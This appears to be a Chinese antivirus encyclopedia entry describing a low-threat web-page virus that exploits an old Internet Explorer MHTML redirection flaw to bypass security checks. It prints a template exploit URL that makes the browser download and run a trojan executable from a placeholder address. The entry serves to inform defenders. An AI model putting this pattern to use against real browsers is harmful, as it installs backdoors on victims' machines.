病毒名称(中文):
病毒别名:
威胁级别:
★★☆☆☆
病毒类型:
文本病毒
病毒长度:
影响系统:
Win9xWinNT
病毒行为:
该网页病毒主要利用IE的“MHTML重定向能下载任意.EXE文件”的漏洞,从而导致IE跳过安全检查。
漏洞利用方法如下:(*注*:以下内容摘自网络)
mhtml:[Mhtml_File_Url]![Original_Resource_Url]
假如在[Mhtml_File_Url]中不能找到[Original_Resource_Url],InternetExplorer程序将下载[Original_Resource_Url],并显示下载的内容。攻击者利用由标签指明的CODEBASE特征并利用下列格式的请求能下载并执行[Trojan_Backdoor_EXE_Url]:
mhtml:file://C:\Not_Exist_File.MHT![Trojan_Backdoor_EXE_Url]